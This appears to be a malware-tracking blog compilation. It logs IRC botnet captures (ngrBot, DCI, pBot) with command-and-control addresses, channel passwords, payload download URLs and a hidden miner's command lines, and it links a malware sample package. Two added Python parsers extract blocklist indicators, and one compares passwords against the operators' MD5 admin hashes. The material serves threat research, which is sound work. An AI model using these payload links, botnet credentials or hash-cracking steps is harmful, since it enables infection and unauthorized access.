92.241.165.134 (ngrBot hosted in Russian Federation, Oao Webalta)

Remote Host / Port Number:
200.122.132.122 80
213.251.170.52 80
81.169.145.73 80
92.241.165.134 7654

IRC session (port 7654):
PASS ngrBot
NICK n{US|XPa}bbvvotv
USER bbvvotv 0 0 :bbvvotv
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://coopeande5.com/imagenes/principal.jpg.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) - Redirected 10 domain(s)
UPDATE: PRIVMSG #oldgold :[DNS]: Blocked

Packed.Win32.Katusha (malware hosted in Netherlands, Amsterdam, Nforce Entertainment B.v)

dq.javagames7.com
Resolved: [ dq.javagames7.com ] To [ 109.201.135.61 ]
Resolved: [ dq.javagames7.com ] To [ 109.201.135.60 ]
Resolved: [ dq.javagames7.com ] To [ 109.201.135.62 ]
Resolved: [ dq.javagames7.com ] To [ 109.201.135.63 ]
TCP Connection Attempts: 109.201.135.63:8800 109.201.135.61:8800 109.201.135.62:8800 109.201.135.60:8800
exe file: http://31.184.237.180/dqs.exe
hosting infos: http://whois.domaintools.com/109.201.135.63

92.243.4.133 (modified DCI bot hosted in France, Gandi)

3 websites use this address (examples: btcminers.biz, labekaa.com, xety.fr).
Remote Host / Port Number:
92.243.4.133 5900

IRC session (port 5900):
PASS Virus
channel: #3new#
NICK VirUs-ymurahxw
USER VirUs "" "gyf" : 8Coded 8VirUs..
NICK VirUs-urxuktmo
USER VirUs "" "gux" :
hosting infos: http://whois.domaintools.com/92.243.4.133

46.20.40.193 (ngrBot hosted in Germany, Myloc Managed It Ag)

Remote Host / Port Number:
213.251.170.52 80
46.20.40.193 1337

IRC session (port 1337):
PASS ngrBot
NICK n{US|XPa}lqosuhk
USER lqosuhk 0 0 :lqosuhk
JOIN #ngr ngrBot
PONG :Astros.GoV
Now talking in #ngr
Topic On: [ #ngr ] [ !mod pdef on ]
Topic By: [ Astros ]
hosting infos: http://whois.domaintools.com/46.20.40.193

40 MB malware samples

Here again with another package for malware lovers; most of them are banking trojans, password stealers and IRC bots. Download: http://adf.ly/2CVhM

b.mobinil.biz (Silent BitCoin GPU Miner using Phoenix Miner)

Pool: http://b.mobinil.biz:8332/
cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6
mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2
mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2
Resolved: [ b.mobinil.biz ] To [ 46.4.123.12 ]
Resolved: [ b.mobinil.biz ] To [ 108.60.208.157 ]
Resolved

115.239.230.68 (ngrBot hosted in China, Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host / Port Number:
115.239.230.68 5101
203.17.62.187 80
213.251.170.52 80
31.184.237.82 80
64.111.199.221 80
66.45.56.124 80
67.225.165.214 80
70.38.98.236 80
70.38.98.239 80

IRC session (port 5101; this variant does not use the standard IRC verbs, shown as captured):
PASS hax0r
KCIK n{US|XPa}ncfvghk
RSSR ncfvghk 0 0 :ncfvghk
SEND #ngme ng00
PRIVMSG #ngme :[d="http://31.184.237.82/ms02.exe" s="100352 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0
PRIVMSG #ngme :[d="http://31.184.237.82/ppbnt.exe" s="61440 bytes"]

77.235.47.132 (ngrBot hosted in Netherlands, Amsterdam, Eurovps)

Remote Host / Port Number:
195.122.131.12 80
213.251.170.52 80
77.235.47.132 4042

IRC session (port 4042):
PASS ngrBot
PRIVMSG #boss :[d="http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}psbuhdn
USER psbuhdn 0 0 :psbuhdn
JOIN #boss ngrBot
PRIVMSG #boss :[MSN]: Updated MSN spread interval to "3"
PRIVMSG #boss :[MSN]: Updated MSN spread message to "haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg"
The data identified by the following URLs
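The four ngrBot captures above (92.241.165.134, 46.20.40.193, 115.239.230.68 and 77.235.47.132) all follow the same shape: a PASS/NICK/USER/JOIN login with an n{country|os}random nick, then PRIVMSG status reports to the channel carrying the payload URL and size in [d="..." s="..."] and the MSN spread text. The parser below is an added example, not the blog's or the sandbox's own tooling; it pulls those indicators out of a capture so they can be fed to a blocklist. The sample capture is constructed by stitching together lines quoted on this page (the KCIK line reproduces the 115.239.230.68 variant, which is caught through its nick rather than its verb), and the field names in NgrBotIndicators are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: lines stitched together from the ngrBot captures quoted
# on this page (nicks, channels and URLs are the ones shown there). The KCIK
# line reproduces the 115.239.230.68 variant that does not use standard verbs.
SAMPLE_IRC = """\
PASS ngrBot
NICK n{US|XPa}bbvvotv
USER bbvvotv 0 0 :bbvvotv
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://coopeande5.com/imagenes/principal.jpg.exe" s="167936 bytes"] Updated bot file "C:\\Documents and Settings\\UserName\\Application Data\\Wcxaxw.exe" - Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) - Redirected 10 domain(s)
KCIK n{US|XPa}ncfvghk
JOIN #boss ngrBot
PRIVMSG #boss :[d="http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe"] Error downloading file [e="12039"]
PRIVMSG #boss :[MSN]: Updated MSN spread interval to "3"
PRIVMSG #boss :[MSN]: Updated MSN spread message to "haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg"
"""

# ngrBot nick: n{<country>|<os flags>}<random>; searched anywhere in a line so
# the variant with substituted verbs (KCIK instead of NICK) is still caught.
NICK_RE = re.compile(r"n\{[A-Z]{2}\|[^}]+\}\w+")
PASS_RE = re.compile(r"^PASS (\S+)$")
JOIN_RE = re.compile(r"^JOIN (#\S+)(?:\s+(\S+))?$")
PRIVMSG_RE = re.compile(r"^PRIVMSG (#\S+) :(.*)$")
# download report the bot posts to the channel: [d="<url>" s="<n> bytes"]
DOWNLOAD_RE = re.compile(r'^\[d="([^"]+)"(?: s="(\d+) bytes")?\]')
URL_RE = re.compile(r"""https?://[^\s"']+""")


@dataclass
class NgrBotIndicators:
    password: Optional[str] = None
    nicks: List[str] = field(default_factory=list)
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    downloads: List[Tuple[str, Optional[int]]] = field(default_factory=list)  # (url, size)
    spread_urls: List[str] = field(default_factory=list)
    dns_reports: int = 0

    @property
    def is_ngrbot(self) -> bool:
        # the 115.239.230.68 capture logs in with a different PASS, so the
        # nick format is the more reliable of the two tells
        return self.password == "ngrBot" or bool(self.nicks)


def parse_ngrbot_irc(capture: str) -> NgrBotIndicators:
    """Walk an IRC capture line by line and collect the indicators an analyst
    pivots on: bot password, nicks, channels and keys, payload URLs the bot
    reported downloading, and URLs it pushes out over MSN."""
    ind = NgrBotIndicators()
    for raw in capture.splitlines():
        line = raw.strip()
        if not line:
            continue
        if (n := NICK_RE.search(line)) and n.group(0) not in ind.nicks:
            ind.nicks.append(n.group(0))
        if m := PASS_RE.match(line):
            ind.password = m.group(1)
        elif m := JOIN_RE.match(line):
            ind.channels[m.group(1)] = m.group(2)
        elif m := PRIVMSG_RE.match(line):
            _channel, body = m.groups()
            if d := DOWNLOAD_RE.match(body):
                url, size = d.groups()
                ind.downloads.append((url, int(size) if size else None))
            elif body.startswith("[DNS]"):
                ind.dns_reports += 1
            elif body.startswith("[MSN]"):
                ind.spread_urls.extend(URL_RE.findall(body))
    return ind


if __name__ == "__main__":
    ind = parse_ngrbot_irc(SAMPLE_IRC)
    print("ngrBot:", ind.is_ngrbot, "password:", ind.password)
    print("channels:", ind.channels)
    for url, size in ind.downloads:
        print("payload:", url, size)
    print("spread via MSN:", ind.spread_urls)
```

A failed download (the rapidshare line) carries no s="..." field, so the size comes back as None instead of the line being dropped; the payload URL is still the part worth blocking. Note that PASS alone is a weak signal: the 115.239.230.68 bot uses hax0r, which is why the nick format is checked independently of the verb in front of it.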

irc.swag.net (around 1.5k bots hosted in Germany, Netdirect)

server: 178.162.234.177:6667
channel: #nix
hackers inside the botnet:
var $admins = array (
    'LiGHTzz' => 'e48e13207341b6bffb7fb1622282247b',
    'cmd' => 'e48e13207341b6bffb7fb1622282247b',
    'broken' => 'e48e13207341b6bffb7fb1622282247b',
Operators: 10 operator(s) online
Channels: 14 channels formed
Clients: I have 131 clients and 1 servers
Local users: Current Local Users: 131 Max: 1574
Global users: Current Global

50.31.0.109 (1k Linux bots hosted in United States, Chicago, Steadfast Networks)

var $config = array(
    "server"=>"50.31.0.109", "port"=>"8080", "pass"=>"", "prefix"=>"tibia|", "maxrand"=>"4",
    "chan"=>"#tibia2", "chan2"=>"#tibia", "key"=>"puto", "modes"=>"+p", "password"=>"lol321",
    "trigger"=>".", "hostauth"=>"*"
// Invisible Users: 2
Channels: 1 channels formed
Clients: I have 148 clients and 0 servers
Local users: Current local users: 148 Max: 1000
Global users: Current global users: 148 Max: 1000
hosting infos: http://whois.domaintools.com/50.31.0.109
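The two PHP bots above (the $admins array from irc.swag.net and the $config array from 50.31.0.109) are pBot-style sources where the C2 and the operator credentials sit in flat PHP arrays. The script below is an added example, not code from the blog or from the bot; it pulls those arrays out of a source file, turns $config into block/hunt indicators, and checks a candidate password against the unsalted MD5 digests pBot keeps for its admins. The sample source is constructed to carry the values quoted on this page; the class wrapper and closing parentheses are assumed, and the helper names are my own.

```python
import hashlib
import re
from typing import Dict, List

# Constructed sample in the shape of the pBot fragments quoted on this page;
# the values are the ones shown for 50.31.0.109 and irc.swag.net. The class
# wrapper and the closing parentheses are assumed, not copied.
SAMPLE_SOURCE = """
class pBot {
    var $config = array("server"=>"50.31.0.109", "port"=>"8080", "pass"=>"",
        "prefix"=>"tibia|", "maxrand"=>"4", "chan"=>"#tibia2", "chan2"=>"#tibia",
        "key"=>"puto", "modes"=>"+p", "password"=>"lol321", "trigger"=>".",
        "hostauth"=>"*");
    var $admins = array(
        'LiGHTzz' => 'e48e13207341b6bffb7fb1622282247b',
        'cmd' => 'e48e13207341b6bffb7fb1622282247b',
        'broken' => 'e48e13207341b6bffb7fb1622282247b',
    );
}
"""

# `var $name = array( ... );` with a flat body (no nested parentheses)
ARRAY_RE = re.compile(r"var\s+\$(\w+)\s*=\s*array\s*\((.*?)\)\s*;", re.DOTALL)
# one 'key' => 'value' pair, either quote style
PAIR_RE = re.compile(r"""(["'])(.*?)\1\s*=>\s*(["'])(.*?)\3""", re.DOTALL)


def extract_php_arrays(source: str) -> Dict[str, Dict[str, str]]:
    """Return every `var $name = array(...)` in the source as name -> {key: value}.
    Only flat string => string arrays are handled, which is all pBot uses."""
    arrays: Dict[str, Dict[str, str]] = {}
    for name, body in ARRAY_RE.findall(source):
        arrays[name] = {key: value for _, key, _, value in PAIR_RE.findall(body)}
    return arrays


def c2_indicators(config: Dict[str, str]) -> Dict[str, object]:
    """Turn a pBot $config array into the fields worth blocking or hunting on."""
    channels = [config[k] for k in sorted(config) if k.startswith("chan") and config[k]]
    return {
        "c2": f"{config.get('server')}:{config.get('port')}",
        "server_pass": config.get("pass") or None,  # empty string = no server password
        "channels": channels,
        "channel_key": config.get("key") or None,
        "nick_prefix": config.get("prefix"),
        "bot_password": config.get("password"),
        "trigger": config.get("trigger"),
        "hostauth": config.get("hostauth"),
    }


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def admins_using_password(admins: Dict[str, str], candidate: str) -> List[str]:
    """pBot stores admin credentials as unsalted MD5, so one hash of a
    candidate (the $config password, a default, a wordlist entry) can be
    compared against every admin at once."""
    digest = md5_hex(candidate)
    return [name for name, stored in admins.items() if stored.lower() == digest]


if __name__ == "__main__":
    arrays = extract_php_arrays(SAMPLE_SOURCE)
    print("indicators:", c2_indicators(arrays["config"]))
    print("admins:", list(arrays["admins"]))
    print("admins reusing the bot password:",
          admins_using_password(arrays["admins"], arrays["config"]["password"]))
```

All three admins on irc.swag.net share one digest, so whatever that password is, recovering it once gives every operator account; the same check run with the $config password or a small wordlist is a cheap first step before throwing the hash at a cracker.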